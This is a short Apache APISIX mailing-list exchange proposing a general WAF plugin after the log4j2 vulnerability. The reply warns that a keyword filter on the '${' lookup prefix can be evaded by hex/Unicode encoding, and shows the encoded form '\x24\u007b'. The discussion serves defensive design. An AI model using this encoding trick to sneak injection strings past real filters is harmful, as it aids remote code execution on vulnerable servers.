Hi,
> Apache APISIX can add a general WAF plug-in to solve similar security
problems
I support adding Security Plugins to prevent common vulnerabilities, then
fulfill the Gateway abilities.
BTW, for the specific log4j2 issue, we should also pay attention to more
encode algorithms, e.g Hex, Unicode. Because if we use some keywords like
`${` to check requests, if the hacker converts it to `"\x24\u007b"`, it may
bypass the WAF check :)
Best Regards!
@ Zhiyuan Ju <https://github.com/juzhiyuan>
Ming Wen <wenm...@apache.org> 于2021年12月17日周五 09:52写道:
> hello, community,
> Apache APISIX does not yet have a WAF plug-in, so when encountering a
> security vulnerability in log4j2, users of Apache APISIX need to write
> their own plug-ins.
>
> In my opinion, Apache APISIX can add a general WAF plug-in to solve
> similar security problems. We can deal with HTTP header, URI args, request
> body (this needs to be cautious and affect performance).
>
> What do you think?
>
> Thanks,
> Ming Wen, Apache APISIX PMC Chair
> Twitter: _WenMing
>
